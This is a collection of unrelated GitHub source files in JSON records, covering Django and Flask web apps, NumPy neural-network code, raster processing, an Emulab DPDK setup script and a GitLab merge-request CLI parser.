zip_safe=False,\n setup_requires=[\n 'setuptools-git >= 0',\n 'setuptools-git-version'\n ],\n install_requires=[\n 'click',\n 'PyYAML',\n 'cryptography',\n ],\n extras_require={\n 'development': [\n 'devpi-client',\n 'docutils',\n 'pyflakes',\n 'flake8',\n 'mock',\n 'pbr',\n 'pdbpp',\n 'pep8 < 1.6',\n 'pytest',\n 'pytest-cov',\n 'pytest-flakes',\n 'pytest-pep8',\n 'pytest-sugar',\n 'repoze.sphinx.autointerface',\n 'setuptools-git',\n 'Sphinx',\n 'tox',\n ],\n },\n entry_points=\"\"\"\n [console_scripts]\n cryptoyaml = cryptoyaml.commands:main\n [pytest11]\n cryptoyaml = cryptoyaml.testing\n \"\"\",\n)\n","repo_name":"getsenic/senic.cryptoyaml","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"19687742072","text":"# -*- coding: utf-8 -*- \r\nfrom ..core import *\r\nfrom ..autograd import *\r\n\r\nclass BatchNorm(Function):\r\n @staticmethod\r\n def forward(x, mean, std, weight, bias, axis, eps=1e-5):\r\n '''Applies Batch Normalization for each channel across a batch of data.\\n\r\n Args:\r\n x (Tensor): input tensor.\r\n mean (ndarray): running mean of the input tensor.\r\n std (ndarray): running std of the input tensor.\r\n weight (Tensor): weight to apply.\r\n bias (Tensor): bias to apply. 
\r\n axis (list): axis indicates the all the axis in the input except C dimention \r\n eps (float): a value added to the denominator for numerical stability.\r\n Shape:\r\n - Input: [N,C,*]\r\n - Output: [N,C,*]\r\n '''\r\n tmp = np.divide(np.subtract(x.data, mean), np.add(std, eps))\r\n result = Tensor(np.add(np.multiply(tmp, weight.data), bias.data))\r\n result.set_creator(BatchNorm.prepare(result.shape, x, weight, bias, mean=mean, std=std, eps=eps, tmp=tmp, axis=axis))\r\n x.child.append(id(result.creator))\r\n weight.child.append(id(result.creator))\r\n bias.child.append(id(result.creator))\r\n return result\r\n\r\n def calc_grad(self, dx):\r\n db = np.sum(dx, axis=self.kwargs['axis'], keepdims=True)\r\n dw = np.sum(np.multiply(self.kwargs['tmp'], dx), axis=self.kwargs['axis'], keepdims=True)\r\n tmp1 = np.multiply(dx, self.var[1].data)\r\n tmp2 = np.subtract(self.var[0].data, self.kwargs['mean'])\r\n tmp3 = np.mean(np.multiply(tmp2, tmp1), axis=self.kwargs['axis'], keepdims=True)\r\n tmp4 = np.add(self.kwargs['std'], self.kwargs['eps'])\r\n tmp5 = np.divide(np.subtract(tmp1, np.divide(np.multiply(tmp2,tmp3), np.square(tmp4))), tmp4)\r\n result = np.subtract(tmp5, np.mean(tmp5, axis=self.kwargs['axis'], keepdims=True))\r\n return result, dw, db\r\n\r\nbatch_norm = BatchNorm(None)","repo_name":"Kashu7100/Qualia2.0","sub_path":"qualia2/functions/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"32"} +{"seq_id":"36564231964","text":"from django.conf.urls import url, include, patterns\nfrom . import views, ajax\n\nurlpatterns = [\n url(r'^login/$', views.login, name='login'),\n\n url(r'^logout/$', views.logout, name='logout'),\n\n url(r'^forget_pwd/$', views.forget_pwd, name='forget_pwd'),\n\n url(r'^reset_pwd/$', views.reset_pwd, name='reset_pwd'),\n\n url(r'^active_account/$', views.active_account, name='active_account'),\n\n url(r'^perfect_admin/$', views.perfect_admin, name='perfect_admin'),\n\n url(r'^perfect_instructor/$', views.perfect_instructor, name='perfect_instructor'),\n\n url(r'^perfect_student/$', views.perfect_student, name='perfect_student'),\n\n url(r'^show_speciality/$', views.show_speciality, name='show_speciality'),\n\n url(r'^show_academy/$', views.show_academy, name='show_academy'),\n\n url(r'^show_admin/$', views.show_admin, name='show_admin'),\n\n url(r'^show_group/$', views.show_group, name='show_group'),\n\n url(r'^show_instructor/$', views.show_instructor, name='show_instructor'),\n\n url(r'^show_student/$', views.show_student, name='show_student'),\n\n url(r'^show_thesis/$', views.show_thesis, name='show_thesis'),\n\n url(r'^show_thesis_self/$', views.show_thesis_self, name='show_thesis_self'),\n\n url(r'^show_thesis_single/$', views.show_thesis_single, name='show_thesis_single'),\n\n url(r'^show_papersection/$', views.show_papersection, name='show_papersection'),\n\n url(r'^show_papersection_single/$', views.show_papersection_single, name='show_papersection_single'),\n\n url(r'^show_papersection_self/$', views.show_papersection_self, name='show_papersection_self'),\n\n\n]\n\nurlpatterns += [\n\n url(r'^content/create_group/$', ajax.create_group),\n url(r'^content/delete_group/$', ajax.delete_group),\n\n url(r'^content/create_academy/$', ajax.create_academy),\n url(r'^content/delete_academy/$', ajax.delete_academy),\n\n url(r'^content/create_speciality/$', ajax.create_speciality),\n url(r'^content/delete_speciality/$', 
ajax.delete_speciality),\n\n url(r'^content/create_admin/$', ajax.create_admin),\n url(r'^content/delete_admin/$', ajax.delete_admin),\n\n url(r'^content/create_instructor/$', ajax.create_instructor),\n url(r'^content/delete_instructor/$', ajax.delete_instructor),\n\n url(r'^content/create_student/$', ajax.create_student),\n url(r'^content/delete_student/$', ajax.delete_student),\n\n\n url(r'^content/create_thesis/$', ajax.create_thesis),\n url(r'^content/delete_thesis/$', ajax.delete_thesis),\n url(r'^content/choice_thesis/$', ajax.choice_thesis),\n\n\n url(r'^content/login/$', ajax.login),\n url(r'^content/logout/$', ajax.logout),\n\n url(r'^content/create_user/$', ajax.create_user),\n\n url(r'^content/forget_pwd/$', ajax.forget_pwd),\n url(r'^content/reset_pwd/$', ajax.reset_pwd),\n url(r'^content/change_pwd/$', ajax.change_pwd),\n\n url(r'^content/perfect_admin/$', ajax.perfect_admin),\n\n url(r'^content/perfect_instructor/$', ajax.perfect_instructor),\n\n url(r'^content/perfect_student/$', ajax.perfect_student),\n\n url(r'^content/delete_admin/$', ajax.delete_admin),\n\n url(r'^content/delete_instructor/$', ajax.delete_instructor),\n\n url(r'^content/delete_student/$', ajax.delete_student),\n\n url(r'^content/get_speciality/$', ajax.get_speciality),\n\n\n]","repo_name":"tmacjx/student_manage","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72076030170","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask\nfrom flask_restful import Api\n\nfrom service.ServiceResource import *\n\n\nclass RestServer():\n def __init__(self, config, serviceManager):\n self.rest = config\n self.app = Flask(__name__)\n self.api = Api(self.app)\n self.api.add_resource(ServiceResource, \"/service/\", resource_class_kwargs={'serviceManager': serviceManager})\n\n self.app.run(debug=True, host=\"0.0.0.0\", port=int(self.rest[\"port\"]))","repo_name":"cdsnlab/AIoTVirt","sub_path":"src/master/RestServer.py","file_name":"RestServer.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"41283046108","text":"from core.services.base_model_service import BaseModelService\nfrom resume.models import RelatedInformation, RelatedInformationImage\nfrom resume.services import InstituteService\n\n\nclass RelatedInformationService(BaseModelService):\n model_class = RelatedInformation\n institute_service = InstituteService()\n\n def update(self, instance, validated_data, **kwargs):\n request = kwargs.get(\"request\")\n user = self.core_service.get_user(request)\n validated_data[\"updated_by\"] = user\n pre_publication = instance.publications if instance.publications else []\n for attr, value in validated_data.items():\n setattr(instance, attr, value)\n instance.save()\n if len(instance.publications) > len(pre_publication):\n self.institute_service.add_batch_publication(instance.user, True)\n elif len(instance.publications) < len(pre_publication):\n self.institute_service.add_batch_publication(instance.user, False)\n return instance\n\n\nclass RelatedInformationImageService(BaseModelService):\n model_class = 
RelatedInformationImage\n","repo_name":"Orbin-Ahmed/findmyworks-backend","sub_path":"resume/services/related_information.py","file_name":"related_information.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38074830878","text":"import os\n\n\nclass FileFinder:\n @staticmethod\n def all_files_recursive(*paths, file_type: str='') -> list:\n files = [] \n path = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..', '..', *paths))\n for obj in os.scandir(path):\n if obj.is_file() and obj.name[-len(file_type):] == file_type:\n files.append((obj.name, obj.path))\n if obj.is_dir():\n files = [*files, *FileFinder.all_files_recursive(*[*paths, obj.name], file_type=file_type)]\n files.sort()\n return files\n\n","repo_name":"shamir0xe/xellu","sub_path":"src/helpers/file/file_finder.py","file_name":"file_finder.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12421780471","text":"import json\nimport unittest\nfrom unittest.mock import patch\nfrom flask import Response, render_template, request\nfrom users import handlers\nfrom users.logic import data_comments\nfrom users.model import comments_info\nfrom users.model.comments_info import Comments\nimport pytest\nfrom flask_testing import TestCase\nfrom mock import Mock, sentinel\nfrom requests import codes, delete\nfrom os import *\n\n\nvalue_test= handlers.Comments(id,name,comment=\"\")\n\n@pytest.mark.run()\ndef test_index(mocker,fixture_client):\n fixture_client.get('/home')\n mocker.patch.object(data_comments, 'get_data', return_value= Response({'from': 'get_data'}))\n resp = fixture_client.get('/home')\n\n assert resp.status_code == 200\n result = json.loads(resp.data.decode())\n \n\n@pytest.mark.run()\n@pytest.mark.parametrize(( 'input','output'\n ),[\n (\n {\"id\":\"\",\"name\":'sheetal', \"comment\":'sheetal here'},\n 'Data Submitted Successfully.'),\n ({\"id\": \"\",\"name\":\"reeta\", \"comment\":\"reeta collection\"},\n 'Data Submitted Successfully.')\n ])\n \ndef test_post(mocker, fixture_client,input,output):\n fixture_client.post('/process')\n process_mock =mocker.patch.object(data_comments,'add_data')\n process_mock.return_value = output\n resp = fixture_client.post('/process',json=input)\n if resp.data.decode() != '':\n\n result_data = resp.data.decode()\n\n return result_data\n\n # result_data = handler_response.data.decode()\n\n assert resp.status_code == 200\n\n@pytest.mark.parametrize(('id','input','output','status_code'\n ),[\n (\n 21,{\"id\":\"1\",\"name\":'sheetal', \"comment\":'sheetal here'},\n 'Data Submitted Successfully.',200),\n (22,{\"id\": \"12\",\"name\":\"reeta\", \"comment\":\"reeta collection\"},\n 'Data Submitted Successfully.',200)\n ])\n@pytest.mark.run()\ndef test_update(mocker,fixture_client,input,output,status_code,id):\n fixture_client.put('/update/')\n update_mock =mocker.patch.object(data_comments,'update_data')\n update_mock.return_value = output\n resp = fixture_client.patch('/update/',json=input)\n if resp.data.decode() != '':\n result_data = resp.data.decode()\n return result_data\n\n assert resp.status_code == status_code\n assert result_data == output.message\n assert update_mock.called\n assert update_mock.called_once_with(id)\n\n@pytest.mark.run()\ndef test_delete(mocker):\n delete_mock = mocker.patch.object(data_comments,'delete_data')\n 
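    # patch data_comments.delete_data with a mock so the call below never hits real storage\n    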
delete_mock.return_value = Response({'from': 'delete_data'})\n resp = data_comments.delete_data(id)\n assert resp.status_code == 200","repo_name":"priyankadhatrak/basic_flask_project","sub_path":"test/unit/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21974973926","text":"import argparse\n\nfrom _version import __version__\n\n\ndef get_cli_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"Create MR.\",\n epilog=\"python create_mr.py --token $(pass show work/CSS/gitlab/private_token) --url --project --source-branch --target-branch --title --assignee-id --remove-source-branch\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"%(prog)s {version}\".format(version=__version__),\n )\n\n parser.add_argument(\n \"-u\",\n \"--url\",\n required=True,\n default=\"https://example.gitlab.com\",\n help=\"Gitlab host/url/server.\",\n )\n parser.add_argument(\n \"-t\",\n \"--token\",\n nargs=\"?\",\n help=\"Private Token to access gitlab API. If not given as argument, set GITLAB_PRIVATE_TOKEN.\",\n )\n parser.add_argument(\n \"--source-branch\", required=True, default=\"staging\", help=\"Source branch.\"\n )\n parser.add_argument(\n \"--target-branch\", required=True, default=\"master\", help=\"Target branch.\"\n )\n parser.add_argument(\n \"--title\", required=True, default=\"MR title.\", help=\"Merge request title.\"\n )\n parser.add_argument(\"--description\", default=\"\", help=\"Merge request description.\")\n parser.add_argument(\n \"--assignee-id\", required=True, default=-1, help=\"Gitlab user id of assignee.\"\n )\n parser.add_argument(\"--milestone-id\", default=-1, help=\"Gitlab milestone id.\")\n # default=False is implied by action='store_true'\n parser.add_argument(\n \"--remove-source-branch\",\n action=\"store_true\",\n help=\"Remove the source branch after merging.\",\n )\n # default=False is implied by action='store_true'\n parser.add_argument(\n \"--only-check-diffs\",\n action=\"store_true\",\n help=\"Only check differences between branches.\",\n )\n parser.add_argument(\"--debug\", action=\"store_true\", help=\"Show debug info.\")\n\n return parser\n","repo_name":"normoes/gitlab_scripts","sub_path":"merge_requests/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6711835833","text":"##############################################################################################################\n####\n#### Mask Effluents\n#### By Cascade Tuholske June 2020\n####\n#### This script fixes the no data values \n#### in the effluent rasteres to speed up \n#### zonal stats processing\n####\n#### BE SURE TO SET DATA TYPE as N OR FIO\n####\n##############################################################################################################\n\n#### Dependencies \n##############################################################################################################\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport rasterio\nimport matplotlib.pyplot as plt \n\n#### File Paths and FN\n##############################################################################################################\nDATA_IN = '../../data/'\nDATA_TYPE = 'N' # FIO or N \nMASK_FN = 
DATA_IN+'interim/inlandwatersheds_mask.tif'\n\nif DATA_TYPE == 'N':\n effluent_rsts = [DATA_IN+'interim/effluent_N.tif', DATA_IN+'interim/effluent_N_treated.tif', \n DATA_IN+'interim/effluent_N_septic.tif', DATA_IN+'interim/effluent_N_open.tif']\n\nelif DATA_TYPE == 'FIO':\n effluent_rsts = [DATA_IN+'interim/effluent_FIO.tif']\n\nelse: \n print('What data, N or FIO?')\n\n#### Functions\n##############################################################################################################\ndef rst_nd_fix(effluent_fn, mask_fn, out_fn):\n \n \"\"\"Function opens effluent raster and fixes the \n no data values \n \n effluent_fn = effluent raster fn\n out_fn = file name out\n \"\"\"\n \n # Open effluent raster\n rst = rasterio.open(effluent_fn)\n meta = rst.meta\n \n # change na values to zero\n band = rst.read(1)\n print(\"min is\", band.min())\n band[band < 0] = 0 \n print(\"min is\", band.min())\n \n print('band max is', band.max())\n\n #Save new data type and mask out\n with rasterio.open(out_fn, 'w', **meta) as dst:\n dst.write(band, 1)\n \n print('Done', out_fn)\n\n#### Run it\n##############################################################################################################\n\n# Make masked rasters\nfor rst in effluent_rsts:\n \n # Get data type\n data = rst.split('interim/')[1].split('.')[0]\n print(data)\n\n # Raster Mask 64 \n print('Starting mask', rst)\n rst_out = DATA_IN+'interim/'+data+'_zero.tif'\n rst_nd_fix(rst, MASK_FN, rst_out)\n \n print('\\n')\n\nprint('DONE!')","repo_name":"OHI-Science/GlobalWasteWater","sub_path":"code/05_zonal_stats/01_raster_NoData_fix.py","file_name":"01_raster_NoData_fix.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7207323073","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass Product(db.Model):\n __tablename__ = 'product'\n\n id = db.Column(db.Integer, primary_key=True)\n nom = db.Column(db.String(255))\n prix = db.Column(db.Numeric(10, 2))\n description = db.Column(db.Text)\n image_url = db.Column(db.Text)\n\n def __init__(self, nom, prix, description, image_url):\n self.nom = nom\n self.prix = prix\n self.description = description\n self.image_url = image_url\n\nclass CartItem(db.Model):\n __tablename__ = 'cart_item'\n\n id = db.Column(db.Integer, primary_key=True)\n cart_id = db.Column(db.Integer, db.ForeignKey('cart.id'))\n product_id = db.Column(db.Integer, db.ForeignKey('product.id'))\n quantity = db.Column(db.Integer, default=1)\n total_price = db.Column(db.Numeric(10, 2))\n product = db.relationship('Product', backref='cart_items')\n\n def __init__(self, cart_id, product_id, quantity, total_price):\n self.cart_id = cart_id\n self.product_id = product_id\n self.quantity = quantity\n self.total_price = total_price\n\n\nclass Cart(db.Model):\n __tablename__ = 'cart'\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n items = db.relationship('CartItem', backref='cart', lazy='dynamic')\n\n def __init__(self, user_id):\n self.user_id = user_id\n\nclass User(db.Model):\n __tablename__ = 'user'\n\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(255))\n admin = db.Column(db.Integer, default=0)\n carts = db.relationship('Cart', backref='user', lazy='dynamic')\n\n def __init__(self, username, admin):\n self.username = username\n self.admin = 
admin\n","repo_name":"gvenet/projet_memoire","sub_path":"server/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20291181793","text":"import logging\n\nfrom sentry import audit_log, features\nfrom sentry.integrations.utils.codecov import has_codecov_integration\nfrom sentry.models.organization import Organization, OrganizationStatus\nfrom sentry.tasks.base import instrumented_task\nfrom sentry.utils.audit import create_system_audit_entry\nfrom sentry.utils.query import RangeQuerySetWrapper\n\nlogger = logging.getLogger(__name__)\n\n\n@instrumented_task(\n name=\"sentry.tasks.auto_enable_codecov.schedule_organizations\",\n queue=\"auto_enable_codecov\",\n max_retries=0,\n) # type: ignore\ndef schedule_organizations(dry_run=False) -> None:\n \"\"\"\n Queue tasks to enable codecov for each organization.\n\n Note that this is not gated by the V2 flag so we can enable the V2\n features independently of the auto-enablement.\n \"\"\"\n logger.info(\"Starting task for sentry.tasks.auto_enable_codecov.schedule_organizations\")\n for organization in RangeQuerySetWrapper(\n Organization.objects.filter(status=OrganizationStatus.ACTIVE)\n ):\n should_auto_enable = features.has(\"organizations:auto-enable-codecov\", organization)\n if should_auto_enable:\n logger.info(\n \"Processing organization\",\n extra={\"organization_id\": organization.id},\n )\n enable_for_organization(organization.id)\n\n\n@instrumented_task( # type: ignore\n name=\"sentry.tasks.auto_enable_codecov.enable_for_organization\",\n queue=\"auto_enable_codecov\",\n max_retries=5,\n)\ndef enable_for_organization(organization_id: int, dry_run=False) -> None:\n \"\"\"\n Set the codecov_access flag to True for organizations with a valid Codecov integration.\n \"\"\"\n try:\n logger.info(\n \"Attempting to enable codecov for organization\",\n extra={\"organization_id\": organization_id},\n )\n organization = Organization.objects.get(id=organization_id)\n has_integration, error = has_codecov_integration(organization)\n if not has_integration:\n logger.warning(\n \"No codecov integration exists for organization\",\n extra={\"organization_id\": organization.id, \"error\": error},\n )\n return\n\n if organization.flags.codecov_access.is_set:\n logger.warning(\n \"Codecov Access flag already set.\",\n extra={\n \"organization_id\": organization.id,\n \"codecov_access\": organization.flags.codecov_access,\n },\n )\n return\n\n organization.flags.codecov_access = True\n organization.save()\n logger.info(\n \"Enabled Codecov Access flag for organization\",\n extra={\n \"organization_id\": organization.id,\n \"codecov_access\": organization.flags.codecov_access,\n },\n )\n\n create_system_audit_entry(\n organization=organization,\n target_object=organization.id,\n event=audit_log.get_event_id(\"ORG_EDIT\"),\n data={\"codecov_access\": \"to True\"},\n )\n\n except Organization.DoesNotExist:\n logger.exception(\n \"Organization does not exist.\",\n extra={\"organization_id\": organization_id},\n )\n except Exception:\n logger.exception(\n \"Error checking for Codecov integration\",\n extra={\"organization_id\": organization_id},\n )\n","repo_name":"yuewucl/sentry","sub_path":"src/sentry/tasks/auto_enable_codecov.py","file_name":"auto_enable_codecov.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} 
+{"seq_id":"35964283867","text":"# Takes as input the copy-pasted list of machines in the \"List View\" tab of\n# Emulab experiment page (must be titled \"machine_list.txt\" in top-level dir)\n# and sets up DPDK on proxies, sequencer, and DT(s). \n# Creates a file with each machine's ID, Node#, interface (only relevant for\n# clients since it will be brought down for DPDK machines), and MAC address.\nimport os\nimport subprocess\nimport shlex\nimport argparse\nimport platform\n\nwhich_ubuntu = int(platform.linux_distribution()[1].split(\".\")[0])\n\ndef get_ctrl_ip(ssh): \n # Needed for erpc\n cmd = ssh + \"\"\" \\\"ifconfig | grep 155\\\\.98\\\\. -B1 | awk 'NR==1{ print $1 }'\\\" \"\"\"\n try:\n iface = subprocess.check_output(shlex.split(cmd))\n iface = iface.decode().split(\":\")[0]\n if not iface:\n return None\n except:\n return None\n\n cmd = ssh + \"\"\" \\\"ifconfig %s | awk -F ' *|:' '/inet %s/{ print $3 }'\\\" \"\"\" % (iface, 'addr' if which_ubuntu != 18 else '')\n try:\n ip = subprocess.check_output(shlex.split(cmd))\n ip = ip.decode().strip()\n if not ip:\n return None\n except:\n return None\n\n return ip\n\n\n# Get both DPDK-enabled interfaces\ndef get_iface(ssh, i):\n cmd = ssh + \"\"\" \\\"ifconfig | grep 10\\\\.1\\\\.%d -B1 | awk 'NR==1{ print $1 }'\\\" \"\"\" % i\n try:\n iface = subprocess.check_output(shlex.split(cmd))\n iface = iface.decode().split(\":\")[0]\n if not iface:\n return None, None\n except:\n return None, None\n\n cmd = ssh + \"\"\" \\\"ifconfig %s | awk -F ' *|:' '/inet %s/{ print $3 }'\\\" \"\"\" % (iface, 'addr' if which_ubuntu != 18 else '')\n try:\n ip = subprocess.check_output(shlex.split(cmd))\n ip = ip.decode().strip()\n if not ip:\n return None, None\n except:\n return None, None\n \n return ip, iface\n \n\ndef get_mac(ssh, iface):\n if iface is None:\n return None\n cmd = ssh + \" \\\"cat /sys/class/net/%s/address\\\"\" % iface\n try: \n mac = subprocess.check_output(shlex.split(cmd))\n return mac.decode().strip()\n except: \n return None\n\ndef get_machine_info():\n clients = []\n proxies = []\n sequencers = []\n deptrackers = []\n machines = {}\n\n manual_input_flag = 0\n\n f = open(\"machine_list.txt\", \"r\")\n dump = open(\"machine_info.txt\", \"w\")\n\n for line in f.readlines():\n if line == '\\n':\n continue\n fields = line.split()\n machinename = fields[0] # e.g., \"client-0\"\n machineid = fields[1] # e.g., \"pc722\"\n\n if \"proxy\" in machinename:\n proxies.append(machinename)\n elif \"dt\" in machinename:\n deptrackers.append(machinename)\n elif \"sequencer\" in machinename:\n sequencers.append(machinename)\n else: \n clients.append(machinename)\n \n machines[machinename] = {\n 'machineid': machineid\n }\n\n ssh = \" \".join(fields[6:]) + \" -o StrictHostKeyChecking=no \"\n print(\"SSH command: \" + ssh)\n\n ctrl_ip = get_ctrl_ip(ssh)\n machines[machinename]['ctrl_ip'] = ctrl_ip\n\n for i in [1, 2]: \n ip, iface = get_iface(ssh, i)\n mac = get_mac(ssh, iface)\n\n if iface is None or mac is None:\n manual_input_flag = 1\n print(\"Couldn't get iface and/or mac--will pause before setting\" +\n \" up DPDK so you can input them manually\")\n\n machines[machinename]['iface%d' % i] = iface\n\n machines[machinename]['mac'] = mac\n machines[machinename]['ip'] = ip\n \n dump.write(\"%s,%s,%s,%s,%s,%s,%s\\n\" % (machinename, machineid, \n machines[machinename]['iface1'], mac, \n ip, ctrl_ip, machines[machinename]['iface2']))\n print(machinename, machineid, machines[machinename]['iface1'], \n mac, ip, ctrl_ip, 
machines[machinename]['iface2'])\n\n f.close()\n dump.close()\n\n if manual_input_flag:\n input(\"Pausing for manual input; save machine_info.txt with\" + \n \" missing values filled in, then hit any key to keep going... \")\n machines, clients, proxies, sequencers, deptrackers = read_machine_info()\n\n return machines, clients, proxies, sequencers, deptrackers\n\n\ndef read_machine_info():\n clients = []\n proxies = []\n sequencers = []\n deptrackers = []\n machines = {}\n\n f = open(\"machine_info.txt\", \"r\")\n\n for line in f.readlines():\n fields = line.split(',')\n machinename = fields[0]\n machineid = fields[1]\n iface = fields[2]\n mac = fields[3]\n ip = fields[4]\n ctrl_ip = fields[5]\n iface2 = fields[6]\n\n if \"proxy\" in machinename:\n proxies.append(machinename)\n elif \"dt\" in machinename:\n deptrackers.append(machinename)\n elif \"sequencer\" in machinename:\n sequencers.append(machinename)\n else: \n clients.append(machinename)\n \n machines[machinename] = {\n 'machineid': machineid,\n 'iface1': iface,\n 'mac': mac,\n 'ip': ip,\n 'ctrl_ip': ctrl_ip,\n 'iface2': iface2\n }\n\n f.close()\n return machines, clients, proxies, sequencers, deptrackers\n\n\ndef setup_machines(whoami, args):\n home = os.getcwd()\n codes = []\n for i, machine in enumerate(machines.keys()):\n machineid = machines[machine]['machineid']\n\n print(\"\\nSetting up DPDK on all machines...\")\n # Takes as arg: iface\n setup_cmd = (\"cd %s; sudo bash dpdk_apt_setup.sh %s %s\" % \n (home, machines[machine]['iface1'], machines[machine]['iface2']))\n\n ssh = \"ssh %s@%s.emulab.net\" % (whoami, machineid) + \" -o StrictHostKeyChecking=no \"\n setup_cmd = \"%s '%s'\" % (ssh, setup_cmd)\n p = subprocess.Popen(shlex.split(setup_cmd))\n \n # This needs to happen serially so compilation doesn't collide\n p.wait()\n codes.append((machine, p.returncode))\n\n for machine, rc in codes: \n print(\"%s completed with exit status %d\" % \n (machine, rc))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Set up all machines.')\n parser.add_argument('whoami',\n help=('Emulab username'))\n parser.add_argument('--read_info',\n help=('If set, read machine info from machine_info.txt rather than' +\n ' parsing machine_list.txt.'),\n action='store_true')\n\n args = parser.parse_args()\n\n if args.read_info:\n machines, clients, proxies, sequencers, deptrackers = read_machine_info()\n else:\n machines, clients, proxies, sequencers, deptrackers = get_machine_info()\n\n setup_machines(args.whoami, args)\n","repo_name":"princeton-sns/mason","sub_path":"setup/parse_machine_list.py","file_name":"parse_machine_list.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70331785050","text":"from glob import glob\nimport os\nimport random\n\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# data = []\n# with open('block1_conv1_filters.json') as fh:\n# data = json.load(fh)\n\njson_dir = 'filter_grads'\n\nfiles = glob(os.path.join(json_dir, '*_filters.json'))\nfile_opts = list(map(lambda s: s.split('/')[-1].replace('_filters.json', ''), files))\n\nprint('Convolution layer options: ')\nfor i, opt in enumerate(file_opts):\n print('{} - {}'.format(i, opt))\n\n# First selection (for layer)\nsel = -1\ntried = False\nwhile sel < 0 or sel >= len(files):\n print('' if not tried else 'Options must be between 0 and {}'.format(len(files) - 1))\n tried = True\n print()\n try:\n sel = int(input('Select an option from the above: 
'))\n except ValueError:\n continue\n\nprint('Picked layer {}'.format(file_opts[sel]))\n\ndata = []\nwith open(files[sel]) as fh:\n data = json.load(fh)\n\nnum_filts = len(data)\n\n# while True:\n# sel = input('Pick a filter between 0-{}: '.format(num_filts - 1))\n#\n# if sel == 'exit':\n# break\n#\n# try:\n# sel = int(sel)\n# if sel < 0 or sel >= num_filts:\n# raise ValueError\n# except ValueError:\n# print('Invalid value entered for filter selection')\n# continue\n#\n# print('You picked filter {}'.format(sel))\n#\n# img = np.uint8(np.array(data[sel][0]))\n#\n# plt.imshow(img)\n# plt.show()\n#\n# print('Thank you for using!')\n\nenums = list(enumerate(data))\nrandom.shuffle(enums)\n\nfor i, (filter, loss) in enums:\n img = np.uint8(np.array(filter))\n\n plt.imshow(img)\n plt.title('Filter {}; Loss {}'.format(i, loss))\n plt.show()\n\n\n","repo_name":"gennadiryan/toy-cnn","sub_path":"visualization/filter_disp.py","file_name":"filter_disp.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9786836609","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\nTomasz Konieczka \nThis is a temporary script file.\n\"\"\"\n\n# run --> python3 projekt.py plik.json dane.txt\n\nimport sys\nimport numpy as np\nfrom funkcje import activation\nfrom dane import auxiliary\nfrom siec import siec as model\nfrom warstwa import warstwa\nfrom tf import tf_test\n\n\nif __name__ == \"__main__\":\n #print(sys.argv)\n print('Number of arguments:', len(sys.argv)-1, 'arguments.\\n')\n if(len(sys.argv) > 3):\n print('ERR!! - Zbyt duzo parametrow wejsciowych.\\nPodaj dwa parametry...')\n sys.exit()\n \n data_raw = np.genfromtxt(sys.argv[2] , delimiter=' ', usecols=(1, 2))\n (x_train, y_train), (x_test, y_test) = auxiliary.dataDividing(data_raw) \n \n tf_model = tf_test()\n tf_model.tf_test(data_raw)\n \n mod = model( [warstwa(3, activation.tanh)], sys.argv[1])\n mod.layers[1].W = np.transpose(tf_model.weights0)\n mod.layers[2].W = np.transpose(tf_model.weights1)\n \n mod.layers[1].bias = np.transpose(tf_model.bias0)\n mod.layers[2].bias = np.transpose(tf_model.bias1)\n pred = mod(x_test[100:101])\n print(y_test[100:101])\n \n print('\\n\\n zaszumienie danych w pliku dane.py!')\n print('\\n dwie przykladowe dane treningowe przed zaszumieniem: {}'.format(x_train[8:10]))\n #zaszumienie danych treningowych\n x_train = auxiliary.dataNoise(x_train, 5)\n print('\\n dwie przykladowe dane treningowe po zaszumieniu: {}'.format(x_train[8:10]))\n \n print('\\n\\nodpowiedz wlasnej sieci: ')\n print(*pred)\n print('\\nodpowiedz tf')\n 